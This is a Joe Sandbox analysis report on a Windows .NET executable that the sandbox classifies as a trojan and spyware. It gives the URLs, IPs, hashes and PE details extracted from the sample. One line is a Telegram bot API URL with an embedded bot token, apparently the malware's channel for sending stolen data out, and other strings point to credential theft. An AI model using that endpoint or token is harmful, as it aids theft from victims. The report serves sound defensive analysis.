http://www.fontbureau.com/designers/?	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.comrm	rzN2ckYW24.exe, 00000000.00000003.262413128.0000000005CB5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/a-d	rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgappdatajVuurjVuur.exe/http://TMVuQQ.com	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/dz	rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/5596534279%discordapi%yyy	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cB	rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersS	rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	rzN2ckYW24.exe, 00000000.00000003.261392765.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fontfabrik.com	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.coma	rzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.commTTF	rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org4Tkh	rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	rzN2ckYW24.exe, 00000000.00000003.260307774.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260356342.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comF	rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.264972803.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comitum	rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comcomp	rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://en.wikipedia	rzN2ckYW24.exe, 00000000.00000003.256683274.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.256591750.0000000005CA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wmwpuO0P35oL9Q.com	rzN2ckYW24.exe, 00000002.00000002.525344688.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmp	rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp//ra	rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.coma	rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd	rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://en.w	rzN2ckYW24.exe, 00000000.00000003.257245989.0000000005C86000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259464865.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259543069.0000000005C88000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comcomF	rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comm	rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comp	rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comals	rzN2ckYW24.exe, 00000000.00000003.266665020.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cns-ea	rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/b	rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
3.220.57.224	api.ipify.org.herokudns.com	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736948
Start date and time:	2022-11-03 12:20:04 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	rzN2ckYW24.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 75 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:21:13	API Interceptor	488x Sleep call for process: rzN2ckYW24.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.154.167.220	Scan_Document_xls.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.MSIL.Bladabindi.1.28850.7667.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Fragtor.155590.23683.28000.exe	Get hash	malicious	Browse
	RFQ# 6000163267.exe	Get hash	malicious	Browse
	Gestempelte ge#U00e4nderte Bestellung.exe	Get hash	malicious	Browse
	NETES F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130#U2026URK75BS#U0130l_pdf.exe	Get hash	malicious	Browse
	5zWNvyL6A7.exe	Get hash	malicious	Browse
	Qoutation_pdf_______________________________.exe	Get hash	malicious	Browse
	kayzx.exe	Get hash	malicious	Browse
	LANKA TILES TOTAL OUTSTANDING PAYMENT..exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	uCfB7hBNmE.exe	Get hash	malicious	Browse
	Drawing sheet.xlsx	Get hash	malicious	Browse
	win.exe	Get hash	malicious	Browse
	Shipment Scan Document.exe	Get hash	malicious	Browse
	zamowienie.xls	Get hash	malicious	Browse
	SOA pdf.exe	Get hash	malicious	Browse
	AMC QUOTATION.doc	Get hash	malicious	Browse
	freight invoices no 5634521.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-gen.163.17629.exe	Get hash	malicious	Browse
3.220.57.224	iirWPHKXWA.exe	Get hash	malicious	Browse	api.ipify.org/
	iirWPHKXWA.exe	Get hash	malicious	Browse	api.ipify.org/
	library_1.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	MPW3FZULO3.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	#U00d6deme kopyas#U0131.exe	Get hash	malicious	Browse	api.ipify.org/
	na.exe	Get hash	malicious	Browse	api.ipify.org/
	IMG0001909022.vbs	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.W32.Trojan.FSDO-8208.24884.exe	Get hash	malicious	Browse	api.ipify.org/
	Qivwb1V6g1.exe	Get hash	malicious	Browse	api.ipify.org/
	UC8CT2nqw6.exe	Get hash	malicious	Browse	api.ipify.org/
	ConsoleApp8.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Trojan.GenericKD.50428043.31193.exe	Get hash	malicious	Browse	api.ipify.org/
	helf.hpl.dll	Get hash	malicious	Browse	api.ipify.org/
	Z27PH1HZ6U.doc	Get hash	malicious	Browse	api.ipify.org/
	5b2ZDL77Fq.doc	Get hash	malicious	Browse	api.ipify.org/
	2AR9mQp9I8.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	F9NrUlchdt.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	tbsvr	Get hash	malicious	Browse	api.ipify.org/
	Cy8ipMMziQ.doc	Get hash	malicious	Browse	api.ipify.org/
	DrC7J6YQnm.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.ipify.org.herokudns.com	Scan_Document_xls.exe	Get hash	malicious	Browse	3.232.242.170
	Remittance copy.exe	Get hash	malicious	Browse	52.20.78.240
	payment copy.exe	Get hash	malicious	Browse	54.91.59.199
	SHIPPING DOC.exe	Get hash	malicious	Browse	3.220.57.224
	Payment advice.exe	Get hash	malicious	Browse	52.20.78.240
	RFQ103122-WOLF MACHINE INC.exe	Get hash	malicious	Browse	52.20.78.240
	New PO.exe	Get hash	malicious	Browse	3.220.57.224
	rolasd.exe	Get hash	malicious	Browse	3.232.242.170
	payment copy.exe	Get hash	malicious	Browse	3.220.57.224
	KWIIR00322677.exe	Get hash	malicious	Browse	52.20.78.240
	WELTER zahnrad GmbH Urgent enquiry Order nr543.exe	Get hash	malicious	Browse	3.220.57.224
	WIRE SWIFT COPY.exe	Get hash	malicious	Browse	3.220.57.224
	Gestempelte ge#U00e4nderte Bestellung.exe	Get hash	malicious	Browse	54.91.59.199
	October SOA.exe	Get hash	malicious	Browse	3.232.242.170
	7901280598.exe	Get hash	malicious	Browse	3.220.57.224
	5zWNvyL6A7.exe	Get hash	malicious	Browse	3.232.242.170
	Qoutation_pdf_______________________________.exe	Get hash	malicious	Browse	3.220.57.224
	kayzx.exe	Get hash	malicious	Browse	54.91.59.199
	iHnURhtmID.exe	Get hash	malicious	Browse	52.20.78.240
	Scombrid.exe	Get hash	malicious	Browse	3.232.242.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	Scan_Document_xls.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Heur.MSIL.Bladabindi.1.28850.7667.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Variant.Fragtor.155590.23683.28000.exe	Get hash	malicious	Browse	149.154.167.220
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	RFQ# 6000163267.exe	Get hash	malicious	Browse	149.154.167.220
	WWW9 (2) (3).exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Scan_Document_xls.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	Remittance copy.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	3qXE1Bpn92.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	0Eot6HTp2y.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	SecuriteInfo.com.Heur.MSIL.Bladabindi.1.28850.7667.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	payment copy.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	Payment copy.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	SHIPPING DOC.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	Payment advice.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	RFQ103122-WOLF MACHINE INC.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	New PO.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	SecuriteInfo.com.Variant.Fragtor.155590.23683.28000.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	payment copy.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	KWIIR00322677.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	file.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	WELTER zahnrad GmbH Urgent enquiry Order nr543.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	WIRE SWIFT COPY.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	Gestempelte ge#U00e4nderte Bestellung.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	October SOA.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224
	NETES F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130#U2026URK75BS#U0130l_pdf.exe	Get hash	malicious	Browse	149.154.167.220 3.220.57.224

Process:	C:\Users\user\Desktop\rzN2ckYW24.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.915053550313837
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	rzN2ckYW24.exe
File size:	684032
MD5:	44159444c9bc9980871b80b3ae071ffb
SHA1:	baf57ff497d2e202a1a119e8719e44c0aa100475
SHA256:	9e4f0e0a10a778fb94e7631c17082b44bf75170d7ca81b393574fd3f4c004f47
SHA512:	5599a5eb0bf29de8db3d3177e2a80049101884fe179bdd28d24fd5d61bdcc6132444a8096f530d94c22151731d08d67835dc2a9844eb3764827bef48361be54f
SSDEEP:	12288:XzFouHH1JJ2iNqkejwFGfnH/OE9ZAFAkG1Z/dSzo3Jz4ABQyxh:XCu1j1UeGPHBA4wqJzr/
TLSH:	92E4124162B64F55F0BE03F90AF6921047BA7D16E662E78C5CC72AEF19A1F80C512B73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M0................0.."...L.......>... ...`....@.. ....................................@................................

File Icon


Icon Hash:	ce9c9496e4949c9e

Static PE Info

General

Entrypoint:	0x4a3e1a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBEFF304D [Fri Jul 17 21:44:45 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
int CCh
int3
int3
int3
int3
cld
aas
xor esi, dword ptr [ebx]
xor esi, dword ptr [ebx]
xor esi, dword ptr [ebx]
add eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
inc eax
add byte ptr [eax], al
